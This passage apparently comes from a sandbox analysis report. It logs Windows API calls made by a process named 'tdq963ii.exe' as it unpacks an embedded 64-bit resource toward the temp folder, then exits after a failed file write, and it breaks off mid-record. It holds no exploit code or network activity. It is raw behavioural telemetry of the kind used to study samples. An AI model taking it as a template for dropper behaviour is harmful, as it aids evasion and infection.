[0239.104] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentPackageId") returned 0x0 [0239.104] GetProcAddress (hModule=0x76d30000, lpProcName="GetTickCount64") returned 0x76d5eee0 [0239.104] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0239.104] GetProcAddress (hModule=0x76d30000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0239.105] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x3bc) returned 0x6660d0 [0239.105] GetCurrentThreadId () returned 0x758 [0239.105] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x666498 [0239.105] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x800) returned 0x6664b8 [0239.105] GetStartupInfoW (in: lpStartupInfo=0x18fed8 | out: lpStartupInfo=0x18fed8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="tdq963ii.exe -accepteula \"Dotted_Line.jtp\" -nobanner", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x40ad42, hStdOutput=0x1bd947d9, hStdError=0x0)) [0239.105] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3 [0239.105] GetFileType (hFile=0x3) returned 0x2 [0239.662] GetStdHandle (nStdHandle=0xfffffff5) returned 0x80 [0239.662] GetFileType (hFile=0x80) returned 0x3 [0239.662] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0239.662] GetFileType (hFile=0xb) returned 0x2 [0239.662] GetCommandLineW () returned="tdq963ii.exe -accepteula \"Dotted_Line.jtp\" -nobanner" [0239.662] GetEnvironmentStringsW () returned 0x666cc0* [0239.663] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xb86) returned 0x667850 [0239.663] FreeEnvironmentStringsW (penv=0x666cc0) returned 1 [0239.663] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x426ea0, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe")) returned 0x32 [0239.663] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x7a) returned 0x666cc0 [0239.663] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xa0) returned 0x666d48 [0239.663] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x3e) returned 0x6683f8 [0239.663] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x6c) returned 0x666df0 [0239.663] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x6e) returned 0x666e68 [0239.663] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x78) returned 0x65f8f0 [0239.663] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x62) returned 0x666ee0 [0239.663] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x2e) returned 0x666f50 [0239.664] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x48) returned 0x666f88 [0239.664] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x2a) returned 0x666fd8 [0239.664] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x28) returned 0x667010 [0239.664] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x1a) returned 0x665aa0 [0239.664] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x4a) returned 0x667040 [0239.664] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x72) returned 0x65f970 [0239.664] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x30) returned 0x667098 [0239.664] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x2e) returned 0x6670d0 [0239.664] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x1c) returned 0x665ac8 [0239.664] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xd2) returned 0x667108 [0239.664] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x7c) returned 0x6671e8 [0239.664] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x36) returned 0x667270 [0239.664] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x3a) returned 0x668440 [0239.664] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x90) returned 0x6672b0 [0239.664] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x24) returned 0x667348 [0239.664] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x30) returned 0x667378 [0239.664] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x36) returned 0x6673b0 [0239.664] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x48) returned 0x6673f0 [0239.664] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x52) returned 0x667440 [0239.664] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x3c) returned 0x668488 [0239.664] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x18) returned 0x6674a0 [0239.664] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x82) returned 0x6674c0 [0239.664] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x2e) returned 0x667550 [0239.664] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x1e) returned 0x665af0 [0239.664] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x2c) returned 0x667588 [0239.665] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x54) returned 0x6675c0 [0239.665] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x52) returned 0x667620 [0239.665] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x2a) returned 0x667680 [0239.665] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x3c) returned 0x6684d0 [0239.665] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x54) returned 0x6676b8 [0239.665] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x24) returned 0x667718 [0239.665] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x30) returned 0x667748 [0239.665] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x8c) returned 0x667780 [0239.665] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x667850 | out: hHeap=0x650000) returned 1 [0239.666] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x800) returned 0x667818 [0239.666] GetLastError () returned 0x0 [0239.666] SetLastError (dwErrCode=0x0) [0239.666] GetLastError () returned 0x0 [0239.666] SetLastError (dwErrCode=0x0) [0239.666] GetLastError () returned 0x0 [0239.666] SetLastError (dwErrCode=0x0) [0239.666] GetACP () returned 0x4e4 [0239.666] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x220) returned 0x668020 [0239.666] GetLastError () returned 0x0 [0239.666] SetLastError (dwErrCode=0x0) [0239.666] IsValidCodePage (CodePage=0x4e4) returned 1 [0239.666] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fecc | out: lpCPInfo=0x18fecc) returned 1 [0239.666] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f994 | out: lpCPInfo=0x18f994) returned 1 [0239.666] GetLastError () returned 0x0 [0239.667] SetLastError (dwErrCode=0x0) [0239.667] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0239.667] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f718, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0239.667] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f9a8 | out: lpCharType=0x18f9a8) returned 1 [0239.667] GetLastError () returned 0x0 [0239.667] SetLastError (dwErrCode=0x0) [0239.667] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0239.667] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f6e8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0239.667] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0239.667] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4d8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0239.667] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x18fca8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿIFÙ\x1bäþ\x18", lpUsedDefaultChar=0x0) returned 256 [0239.667] GetLastError () returned 0x0 [0239.667] SetLastError (dwErrCode=0x0) [0239.667] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0239.667] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f6f8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0239.668] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0239.668] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4e8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0239.668] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x18fba8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿIFÙ\x1bäþ\x18", lpUsedDefaultChar=0x0) returned 256 [0239.668] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x80) returned 0x668248 [0239.668] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0239.668] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x40f584) returned 0x0 [0239.668] RtlSizeHeap (HeapHandle=0x650000, Flags=0x0, MemoryPointer=0x668248) returned 0x80 [0239.669] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0239.669] GetProcAddress (hModule=0x76d30000, lpProcName="IsWow64Process") returned 0x76d4195e [0239.669] GetCurrentProcess () returned 0xffffffff [0239.669] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x18ff34 | out: Wow64Process=0x18ff34) returned 1 [0239.669] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18fd28, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe")) returned 0x32 [0239.669] ExpandEnvironmentStringsW (in: lpSrc="%TEMP%", lpDst=0x18fb20, nSize=0x104 | out: lpDst="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned 0x25 [0239.669] FindResourceW (hModule=0x0, lpName="RCHANDLE64", lpType="BINRES") returned 0x476060 [0239.669] LoadResource (hModule=0x0, hResInfo=0x476060) returned 0x43c648 [0239.669] SizeofResource (hModule=0x0, hResInfo=0x476060) returned 0x37490 [0239.669] LockResource (hResData=0x43c648) returned 0x43c648 [0239.670] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6682d0 [0239.670] CreateFileW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\tdq963ii64.exe" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\tdq963ii64.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x18f95c, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.671] GetLastError () returned 0x20 [0239.671] GetLastError () returned 0x20 [0239.671] SetLastError (dwErrCode=0x20) [0239.671] GetLastError () returned 0x20 [0239.671] SetLastError (dwErrCode=0x20) [0239.671] GetLastError () returned 0x20 [0239.671] SetLastError (dwErrCode=0x20) [0239.671] GetLastError () returned 0x20 [0239.671] SetLastError (dwErrCode=0x20) [0239.671] GetLastError () returned 0x20 [0239.671] SetLastError (dwErrCode=0x20) [0239.671] GetLastError () returned 0x20 [0239.671] SetLastError (dwErrCode=0x20) [0239.671] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1000) returned 0x669828 [0239.673] WriteFile (in: hFile=0x80, lpBuffer=0x18ea08*, nNumberOfBytesToWrite=0x49, lpNumberOfBytesWritten=0x18e334, lpOverlapped=0x0 | out: lpBuffer=0x18ea08*, lpNumberOfBytesWritten=0x18e334*=0x49, lpOverlapped=0x0) returned 1 [0239.675] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x667818 | out: hHeap=0x650000) returned 1 [0239.675] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x18fedc | out: phModule=0x18fedc) returned 0 [0239.675] ExitProcess (uExitCode=0x1) [0239.675] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6660d0 | out: hHeap=0x650000) returned 1 Process: id = "258" image_name = "tdq963ii.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe" page_root = "0x14a26000" os_pid = "0x6f4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "210" os_parent_pid = "0xab8" cmd_line = "tdq963ii.exe -accepteula -c Run -y -p extract -nobanner" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 868 os_tid = 0x90c [0239.771] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76d30000 [0239.772] GetProcAddress (hModule=0x76d30000, lpProcName="SetEvent") returned 0x76d416c5 [0239.772] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForSingleObject") returned 0x76d41136 [0239.772] GetProcAddress (hModule=0x76d30000, 